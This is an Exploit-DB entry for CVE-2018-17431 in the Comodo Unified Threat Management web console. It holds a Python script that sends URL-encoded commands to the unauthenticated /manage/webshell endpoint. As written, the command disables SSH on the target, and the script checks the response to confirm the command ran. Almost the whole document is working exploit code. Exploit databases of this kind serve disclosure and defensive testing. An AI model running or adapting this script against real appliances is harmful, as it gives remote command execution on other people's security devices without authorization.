Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution

EDB-ID:

48825




Platform:

Multiple

Date:

2020-09-22


# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
# Date: 2018-08-15
# Exploit Author: Milad Fadavvi
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
# Vendor Homepage: https://www.comodo.com/
# Version: Releases before 2.7.0 & 1.5.0 
# Tested on: Windows=Firefox/chrome - Kali=firefox
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
# CVE : CVE-2018-17431
# CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8 

import requests

def RndInt(Lenght):
    from random import choice
    from string import digits

    RandonInt = ''.join([choice(digits) for n in range(Lenght)])
    return str(RandonInt)

if __name__ == "__main__":

    IP = input("IP: ")
    Port = input("Port: ")

    Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
    '''For more info about command try to read manual of spesefic version of Comodo UTM and 
       exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
     '''

    BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
    BaseNComdURL = BaseURL + "&k=" + Command
    LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13) 
    FullURL = BaseNComdURL + LastPart
    AddetionalEnter = BaseURL + "&k=%0a" + LastPart

    try:
        FirstResponse = requests.get(FullURL).text
    except:
        print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
        exit(1)
    
    SecondResponse = requests.get(AddetionalEnter).text
    if SecondResponse.find("Configuration has been altered") == -1:
        print("\nExploit Failed!\n")
        exit(1)
    else:
        print("\nOK! Command Ran!\n")
    exit(0)